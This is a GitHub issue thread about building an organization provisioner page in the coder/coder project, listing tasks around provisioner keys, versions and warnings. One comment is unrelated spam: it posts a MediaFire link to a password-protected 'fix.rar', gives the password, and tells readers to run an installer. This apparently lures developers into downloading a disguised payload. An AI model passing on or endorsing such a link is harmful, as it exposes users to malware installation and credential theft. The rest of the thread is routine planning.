### ISSUE TITLE
API: Organization Provisioner Page

### ISSUE THREAD

**Issue by f0ssel** [coder/coder#14439]
The tasks required for a functional page are:
- [ ] Ensure PSK provisioners can only connect to the default org
- [x] Define what "active" means for a provisioner and compose a way to return only active provisioners
- [x] Ensure we can compare provisioner protocol version (for out of date warnings)
- [x] Enumerate types of warnings possible so frontend can design
- [x] Connect provisioner keys and provisioner connections - Add reference `key` field to provisioners table
- [x] Return list of provisioners to frontend grouped by authentication type: provisioner key, PSK, and built in 
  - Provisioner key fields: name, tags, created at, last used
  - Provisioner fields: name, scope, tags (if applicable), and version

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Kira-Pilot** [comment]
Est: L
